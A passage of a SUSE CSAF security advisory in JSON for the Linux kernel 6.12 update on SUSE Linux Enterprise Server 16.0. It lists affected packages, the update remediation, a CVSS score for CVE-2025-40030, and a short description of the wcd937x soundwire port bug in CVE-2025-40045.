"url": "https://bugzilla.suse.com/1252773"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-40030"
},
{
"cve": "CVE-2025-40045",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40045"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: codecs: wcd937x: set the comp soundwire port correctly\n\nFor some reason we endup with setting soundwire port for\nHPHL_COMP and HPHR_COMP as zero, this can potentially result\nin a memory corruption due to accessing and setting -1 th element of\nport_map array.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
